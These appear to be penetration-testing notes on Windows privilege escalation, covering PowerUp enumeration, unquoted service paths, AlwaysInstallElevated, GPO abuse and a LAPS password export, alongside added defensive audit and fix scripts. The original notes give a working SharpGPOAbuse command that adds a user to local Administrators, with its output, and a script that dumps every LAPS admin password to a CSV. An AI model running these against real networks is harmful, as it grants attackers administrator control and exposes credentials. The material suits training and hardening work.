Local PrivEsc

# Dot-source PowerUp and run every check
. .\PowerUp.ps1
Invoke-AllChecks

# Individual PowerUp checks
Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose
Get-ModifiableService -Verbose

# Other enumeration tools
.\beRoot.exe
Invoke-PrivEsc
  • Look for unquoted service path vulnerabilities

  • Check for modifiable registry autoruns and configs

Unquoted service path: when a Windows service is installed, it is associated with an executable file that defines what the service does.

This executable is specified by a file path. If that path contains spaces and is not enclosed in quotation marks, Windows may misinterpret it, allowing an attacker to substitute their own payload for the original executable.

  • Now restart the machine so that the service gets restarted!
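The following is an added defender's check, not PowerUp's code and not part of the original page. It enumerates services whose image path is unquoted and contains spaces, lists each intermediate path that Windows would try before the real binary, reports whether a low-privileged principal can write to any of those directories, and can rewrite the ImagePath with proper quotes. The helper and function names are my own; it assumes an elevated session so that every service's ImagePath is readable.

```powershell
# Added example (not PowerUp's code): audit services for unquoted image paths,
# show which intermediate directories a low-privileged user can write to,
# and quote the path in the registry to fix it.
# Assumed: run elevated so every service's ImagePath is readable.

function Test-WritableByLowPriv {
    # True when a well-known low-privileged principal holds an Allow ACE that
    # includes the CreateFiles/WriteData bit (0x2) on the directory.
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $lowPriv = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone', 'NT AUTHORITY\INTERACTIVE')
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        # FullControl, Modify and Write all contain the CreateFiles bit; generic
        # rights (GENERIC_WRITE) are not decoded here and need a separate check.
        if (([int]$ace.FileSystemRights -band 0x2) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if ([string]::IsNullOrWhiteSpace($path) -or $path.StartsWith('"')) { continue }
        # The executable ends at the first ".exe" followed by whitespace or end of
        # string, which mirrors CreateProcess trying the shortest candidate first.
        $m = [regex]::Match($path, '^(?<exe>.*?\.exe)(\s|$)', 'IgnoreCase')
        if (-not $m.Success) { continue }
        $exe = $m.Groups['exe'].Value
        if ($exe -notmatch '\s') { continue }       # no spaces, nothing ambiguous
        # Each space-delimited prefix plus ".exe" is tried before the real binary.
        $parts = $exe -split ' '
        $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
            ($parts[0..($i - 1)] -join ' ') + '.exe'
        }
        $writable = $candidates | Where-Object { Test-WritableByLowPriv (Split-Path -Path $_ -Parent) }
        [pscustomobject]@{
            Name         = $svc.Name
            RunsAs       = $svc.StartName
            ImagePath    = $path
            Candidates   = $candidates
            WritableDirs = @($writable | ForEach-Object { Split-Path -Path $_ -Parent } | Select-Object -Unique)
            QuotedPath   = ('"{0}"{1}' -f $exe, $path.Substring($exe.Length))
        }
    }
}

function Repair-UnquotedServicePath {
    # Rewrites ImagePath with the executable quoted; any arguments are kept as-is.
    param([Parameter(Mandatory)][string]$Name, [Parameter(Mandatory)][string]$QuotedPath)
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    Set-ItemProperty -Path $key -Name ImagePath -Value $QuotedPath
}

# Usage: list every finding, then fix the ones where a candidate directory is writable.
$findings = Get-UnquotedServicePath
$findings | Format-List Name, RunsAs, ImagePath, WritableDirs
foreach ($f in $findings | Where-Object { $_.WritableDirs.Count -gt 0 }) {
    Repair-UnquotedServicePath -Name $f.Name -QuotedPath $f.QuotedPath
}
```

A service with an unquoted path but no writable candidate directory is a hygiene issue rather than an exposure, which is why the fix loop keys on WritableDirs. The registry change only takes effect when the service is restarted, which matches the restart step above.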

AlwaysInstallElevated

  • AlwaysInstallElevated is a type of registry escalation; it is equivalent to granting full control, just like admin rights. An attacker can potentially drop a malicious MSI and get a reverse shell.

  • Refer to this writeup
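As an added example (not from the page or the writeup it refers to), the check below reports whether AlwaysInstallElevated is actually effective and turns it off. The point a practitioner needs: the policy only elevates MSI installs when both the machine value (HKLM) and the user value (HKCU) are 1, so a single 1 is not yet exploitable. The function names are my own.

```powershell
# Added example (not the page's code): report whether AlwaysInstallElevated is
# effective and disable it. Windows Installer only elevates when BOTH the
# machine (HKLM) and the user (HKCU) value are set to 1.

$InstallerPolicyKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'

function Get-AlwaysInstallElevatedState {
    $details = foreach ($hive in 'HKLM', 'HKCU') {
        $key = "${hive}:\$InstallerPolicyKey"
        $item = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $value = if ($item) { $item.AlwaysInstallElevated } else { $null }
        [pscustomobject]@{ Hive = $hive; Key = $key; Value = $value; Enabled = ($value -eq 1) }
    }
    [pscustomobject]@{
        Effective = (@($details | Where-Object Enabled).Count -eq 2)   # both hives must be 1
        Details   = $details
    }
}

function Disable-AlwaysInstallElevated {
    # Writing 0 rather than deleting the value leaves an explicit, auditable "disabled" state.
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "${hive}:\$InstallerPolicyKey"
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

$state = Get-AlwaysInstallElevatedState
$state.Details | Format-Table Hive, Value, Enabled -AutoSize
if ($state.Effective) {
    Write-Warning 'AlwaysInstallElevated is active for this user: MSI packages install with SYSTEM privileges.'
    Disable-AlwaysInstallElevated
}
```

The HKCU half only covers the user running the script, so the durable fix is the Group Policy setting "Always install with elevated privileges" set to Disabled under both Computer Configuration and User Configuration; the local check is for confirming what a given host and user currently get.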

Abusing GPO permissions

We abuse the GPO by adding the user to the local Administrators group, using a tool called SharpGPOAbuse.exe.

# Add the user to the local Administrators group

PS C:\Enterprise-Share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
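The output above shows the two things a defender can look for: a principal with edit rights on a GPO, and a ScheduledTasks.xml dropped under the GPO's Preferences folder in SYSVOL. The script below is an added example, not SharpGPOAbuse's code and not from the page: it lists GPO edit rights held by anyone outside an approved list and parses SYSVOL for immediate tasks. It assumes the GroupPolicy and ActiveDirectory RSAT modules, a domain account that can read SYSVOL, and the Group Policy Preferences XML element names (ImmediateTaskV2, Author, Command, Arguments); the function names and the approved-principal list are my own.

```powershell
# Added example (not SharpGPOAbuse's code): find GPOs that non-approved principals
# can edit, and list Group Policy Preferences immediate tasks found in SYSVOL.
# Assumed: GroupPolicy + ActiveDirectory RSAT modules, read access to SYSVOL.
Import-Module GroupPolicy
Import-Module ActiveDirectory

function Get-GpoEditRights {
    param([string[]]$Approved = @('Domain Admins', 'Enterprise Admins', 'SYSTEM', 'ENTERPRISE DOMAIN CONTROLLERS'))
    foreach ($gpo in Get-GPO -All) {
        foreach ($perm in Get-GPPermission -Guid $gpo.Id -All) {
            if (@('GpoEdit', 'GpoEditDeleteModifySecurity') -notcontains $perm.Permission) { continue }
            if ($Approved -contains $perm.Trustee.Name) { continue }
            [pscustomobject]@{
                GPO        = $gpo.DisplayName
                Id         = $gpo.Id
                Trustee    = $perm.Trustee.Name
                Permission = $perm.Permission
            }
        }
    }
}

function Get-GppImmediateTask {
    # Walks every policy folder in SYSVOL, parses ScheduledTasks.xml and returns
    # each ImmediateTaskV2 entry with its author and command line.
    $domain = (Get-ADDomain).DNSRoot
    $policies = "\\$domain\SYSVOL\$domain\Policies"
    foreach ($file in Get-ChildItem -Path $policies -Recurse -Filter ScheduledTasks.xml -ErrorAction SilentlyContinue) {
        [xml]$doc = Get-Content -LiteralPath $file.FullName -Raw
        foreach ($task in $doc.SelectNodes('//ImmediateTaskV2')) {
            [pscustomobject]@{
                GpoGuid   = ($file.FullName -replace '.*\\(\{[0-9A-Fa-f-]+\})\\.*', '$1')
                Scope     = if ($file.FullName -match '\\Machine\\') { 'Machine' } else { 'User' }
                TaskName  = $task.name
                Author    = $task.SelectSingleNode('.//Author').InnerText
                Command   = $task.SelectSingleNode('.//Command').InnerText
                Arguments = $task.SelectSingleNode('.//Arguments').InnerText
                Changed   = $task.changed
            }
        }
    }
}

# Usage: review both lists; an immediate task in a GPO that a low-privileged
# principal can edit is the combination shown in the output above.
Get-GpoEditRights | Format-Table -AutoSize
Get-GppImmediateTask | Format-List
```

Immediate tasks are legitimate in some environments, so the review criterion is the combination of an unexpected author, a command such as cmd.exe or a local group change, and a GPO that an unprivileged account can edit. With directory service object auditing enabled, the versionNumber bump shown in the output above also produces a Security event 5136 (directory service object modified) on the domain controller.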

Export LAPS Passwords

# Pull the LAPS password and expiry attributes for every computer object
$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
# Show them on screen, oldest expiry first
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
# Export to a date-stamped CSV (C:\temp must already exist)
$Computers | Export-Csv -Path "C:\temp\LAPS-$((Get-Date).ToString('MM-dd-yyyy')).csv" -NoTypeInformation

Save it as:

C:\Scripts\LAPSexport.ps1

Then run the script to verify that it works correctly. If it does, automate the procedure by creating a scheduled task.
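The export above writes every local administrator password in plain text to a CSV, so the file's location matters as much as the script. The following is an added variant, not the page's script: it locks the output directory down to SYSTEM and Administrators before writing, exports only computers that actually hold a LAPS password, and converts the FILETIME expiry into a readable date. The output path C:\LAPS-Backup is a constructed assumption.

```powershell
# Added example (not the page's script): the same LAPS export with a locked-down
# output directory, only populated entries, and a readable expiry column.
# Assumed: ActiveDirectory module; the running account holds the ms-Mcs-AdmPwd read right.
Import-Module ActiveDirectory

$OutDir = 'C:\LAPS-Backup'   # constructed path, not from the page
if (-not (Test-Path -LiteralPath $OutDir)) {
    New-Item -ItemType Directory -Path $OutDir | Out-Null
}
# Drop inherited ACEs and replace the grants with SYSTEM and Administrators only.
# (OI)(CI) makes the ACE apply to files and subfolders created later, i.e. the CSVs.
icacls.exe $OutDir /inheritance:r /grant:r 'SYSTEM:(OI)(CI)F' 'BUILTIN\Administrators:(OI)(CI)F' | Out-Null

$Stamp = (Get-Date).ToString('MM-dd-yyyy')
$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime |
    Where-Object { $_.'ms-Mcs-AdmPwd' } |                    # skip computers with no LAPS password
    Select-Object Name, DnsHostName, 'ms-Mcs-AdmPwd',
        @{ Name = 'ExpirationTime'; Expression = { [DateTime]::FromFileTime([long]$_.'ms-Mcs-AdmPwdExpirationTime') } }

$Computers | Sort-Object ExpirationTime |
    Export-Csv -Path (Join-Path $OutDir "LAPS-$Stamp.csv") -NoTypeInformation
```

When this runs from a scheduled task, the task account needs the extended right to read ms-Mcs-AdmPwd, and that account becomes a high-value credential in its own right. Windows LAPS (as opposed to the legacy LAPS shown here) stores the password in msLAPS-Password and msLAPS-PasswordExpirationTime instead, so the attribute names need changing for that deployment.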
